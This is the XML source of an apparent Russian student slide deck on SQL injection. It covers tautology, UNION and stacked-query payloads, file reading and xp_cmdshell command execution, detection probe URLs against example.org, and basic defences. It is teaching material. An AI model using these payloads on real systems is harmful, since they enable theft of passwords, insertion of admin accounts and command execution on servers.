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1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33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01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8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0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5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82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31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B48A-789E-4033-8218-F335ECEA844E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5A73-3289-4AB0-BF3D-D1147891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6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xample.org/?id=1+ORDER+BY+qweweqweqwe" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.org/?id=1" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.org/?id=1+AND+1=2--" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.org/getproduct?id=-1+OR+1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mple.org/?id=1+AND+1=1--" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.org/?id=1&#8217;/*" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.org/?id=1&#8217;--" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.org/?id=1+union+select+concat_ws(0x3a,table_name,column_name)+from+information_s%20chema.column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org/getproduct?id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org/getproduct?id=-1+OR+1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org/getproduct?id=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0748" y="1506676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ru-RU" sz="4800" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="4800" dirty="0" smtClean="0"/>
              <a:t>SQL инъекции</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="4800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Внедрение SQL-кода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95861" y="4595951"/>
            <a:ext cx="3896139" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l" hangingPunct="0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Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" pitchFamily="2"/>
                <a:cs typeface="FreeSans" pitchFamily="2"/>
              </a:rPr>
              <a:t>Выполнил:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" hangingPunct="0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Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" pitchFamily="2"/>
                <a:cs typeface="FreeSans" pitchFamily="2"/>
              </a:rPr>
              <a:t>Суханов Кирилл, ВМИ-117</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" hangingPunct="0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Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" pitchFamily="2"/>
                <a:cs typeface="FreeSans" pitchFamily="2"/>
              </a:rPr>
              <a:t>kasuhanov@gmail.com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2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1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SQL инъекция в строковом параметре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ru-RU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$</a:t>
            </a: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name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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; 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 INTO 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user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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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ru-RU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 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('xtal','1337') --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31234" y="1292991"/>
            <a:ext cx="9329531" cy="1683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4" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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* FROM products</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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product_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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name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= ‘$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name’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean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1233" y="4357217"/>
            <a:ext cx="9329531" cy="2408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2" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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* FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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name 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= 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‘’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 INTO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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ru-RU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user,password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 ('xtal','1337')</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" dirty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1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 с файловой системой зависит от эксплуатируемой СУБД.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Пример для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MSSQL: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31234" y="2494503"/>
            <a:ext cx="9329531" cy="29902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2" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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 TABLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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mydata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(line varchar(8000));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BULK INSERT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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mydata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 'c:\boot.ini';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* FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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mydata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DROP TABLE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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mydata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60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1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Выполнение команд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Синтаксис зависит от эксплуатируемой СУБД!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Пример для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> и </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MySQL: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31234" y="2825084"/>
            <a:ext cx="9329531" cy="8995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2" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> 'ipconfig /all';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean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Обнаружение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>инъекций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532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Основные способы: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Тестирование функций (черный или белый ящик)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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Анализ исходного кода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ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Пример тестирования функций для </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://example.org/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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3"/>
              </a:rPr>
              <a:t>http://example.org/?id=1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3"/>
              </a:rPr>
              <a:t>http://example.org/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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4"/>
              </a:rPr>
              <a:t>http://example.org/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>’--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5"/>
              </a:rPr>
              <a:t>http://example.org/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>’/*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6"/>
              </a:rPr>
              <a:t>http://example.org/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>+AND+1=1--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7"/>
              </a:rPr>
              <a:t>http://example.org/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>+AND+1=2--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8"/>
              </a:rPr>
              <a:t>http://example.org/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>ORDER+BY+qweweqweqwe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hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://example.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>/?id=1+union+select+concat_ws(0x3a,table_name,column_name)+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>from+information_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>chema.columns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47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Защита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Основные методы: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Экранирование спецсимволов  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘ -&gt; \’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Проверка типа для числовых параметров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Усечение параметра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Поиск </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>выражений в параметре</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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69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Внедрение SQL-кода (англ. SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) — один из распространённых способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода.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4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Типовая схема потенциально уязвимого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33" y="1690688"/>
            <a:ext cx="9923333" cy="4714642"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39193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 атаки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ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Для запроса </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://example.org/getproduct?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>выполнится: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431233" y="1674261"/>
            <a:ext cx="9329531" cy="1961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ru-RU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getProduct(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="24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){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ru-RU" sz="24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query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="24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("SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="24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r>
              <a:rPr lang="ru-RU" sz="24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WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="24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24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= "+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="24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24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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ru-RU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  <a:endParaRPr lang="ru-RU" sz="24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1233" y="4429990"/>
            <a:ext cx="9329531" cy="1961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2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* FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="28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r>
              <a:rPr lang="ru-RU" sz="2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WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="28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2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= 1</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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 атаки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400" dirty="0" smtClean="0"/>
              <a:t>Но для запроса </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://example.org/getproduct?id=-1+OR+1=1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431234" y="2587939"/>
            <a:ext cx="9329531" cy="1961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4" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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* FROM 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endParaRPr lang="ru-RU" sz="3200" dirty="0" smtClean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4" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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= -1 OR 1=1</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" dirty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Оператор </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean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Объединяет результаты двух или более запросов в один результирующий набор, в который входят все строки, принадлежащие всем запросам в объединении.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Ограничения:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Количество и порядок столбцов должны быть одинаковыми во всех запросах;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Типы данных должны быть совместимыми;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3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Пример использования оператора </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Union</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU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 hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0">
                <a:highlight>
                  <a:scrgbClr r="0" g="0" b="0">
                    <a:alpha val="0"/>
                  </a:scrgbClr>
                </a:highlight>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://example.org/getproduct?id=-1+union+select+user,password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:highlight>
                  <a:scrgbClr r="0" g="0" b="0">
                    <a:alpha val="0"/>
                  </a:scrgbClr>
                </a:highlight>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" smtClean="0">
                <a:highlight>
                  <a:scrgbClr r="0" g="0" b="0">
                    <a:alpha val="0"/>
                  </a:scrgbClr>
                </a:highlight>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" dirty="0" err="1" smtClean="0">
                <a:highlight>
                  <a:scrgbClr r="0" g="0" b="0">
                    <a:alpha val="0"/>
                  </a:scrgbClr>
                </a:highlight>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>from+admin</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" dirty="0" smtClean="0"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1234" y="2587939"/>
            <a:ext cx="9329531" cy="3723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4" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
            </a:pP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en-US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name, description, cost</a:t>
            </a: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FROM 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endParaRPr lang="ru-RU" sz="3200" dirty="0" smtClean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4" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
            </a:pP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= -1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
            </a:pP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UNION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
            </a:pP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user</a:t>
            </a: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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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, 0</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" dirty="0" smtClean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4" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
            </a:pP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</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" dirty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Экранирование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$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= -1 UNION SELECT * FROM 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ru-RU" dirty="0">
                <a:latin typeface="FreeMono" pitchFamily="49"/>
              </a:rPr>
              <a:t>— </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>не пройдет!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pP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$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= -1 UNION SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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--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31234" y="1825625"/>
            <a:ext cx="9329531" cy="1961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4" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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* FROM 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endParaRPr lang="ru-RU" sz="3200" dirty="0" smtClean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4" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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= $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="32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32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1=1</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" dirty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1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Расщепление SQL-запроса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$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= 42; INSERT INTO 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user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ru-RU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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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ru-RU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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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('xtal','1337') --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31234" y="1292991"/>
            <a:ext cx="9329531" cy="1683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4" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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* FROM products</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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id = $id AND 1=1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31233" y="4357217"/>
            <a:ext cx="9329531" cy="2408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2" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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* FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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= 42;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 INTO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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admin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ru-RU" sz="2800" dirty="0" err="1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user,password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2" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="1417"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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 ('xtal','1337')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ru-RU" sz="2800" dirty="0" smtClean="0">
                <a:highlight>
                  <a:scrgbClr r="0" g="0" b="0">
                    <a:alpha val="0"/>
                  </a:scrgbClr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rPr>
              <a:t>-- AND 1=1</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2800" dirty="0">
              <a:highlight>
                <a:scrgbClr r="0" g="0" b="0">
                  <a:alpha val="0"/>
                </a:scrgbClr>
              </a:highligh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484</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Широкоэкранный</PresentationFormat>
  <Paragraphs>94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Droid Sans Fallback</vt:lpstr>
      <vt:lpstr>FreeMono</vt:lpstr>
      <vt:lpstr>FreeSans</vt:lpstr>
      <vt:lpstr>Lucida Sans Unicode</vt:lpstr>
      <vt:lpstr>Тема Office</vt:lpstr>
      <vt:lpstr>SQL injection SQL инъекции Внедрение SQL-кода</vt:lpstr>
      <vt:lpstr>Определение</vt:lpstr>
      <vt:lpstr>Типовая схема потенциально уязвимого приложения</vt:lpstr>
      <vt:lpstr>Принцип атаки</vt:lpstr>
      <vt:lpstr>Принцип атаки</vt:lpstr>
      <vt:lpstr>Оператор Union</vt:lpstr>
      <vt:lpstr>Пример использования оператора Union</vt:lpstr>
      <vt:lpstr>Экранирование запроса</vt:lpstr>
      <vt:lpstr>Расщепление SQL-запроса</vt:lpstr>
      <vt:lpstr>SQL инъекция в строковом параметре</vt:lpstr>
      <vt:lpstr>Работа с файловой системой</vt:lpstr>
      <vt:lpstr>Выполнение команд на сервере</vt:lpstr>
      <vt:lpstr>Обнаружение SQL инъекций</vt:lpstr>
      <vt:lpstr>Защита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SQL инъекции Внедрение SQL-кода</dc:title>
  <dc:creator>Кирилл Суханов</dc:creator>
  <cp:lastModifiedBy>Кирилл Суханов</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-11-04T15:43:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-11-04T17:57:20Z</dcterms:modified>
</cp:coreProperties>
</file>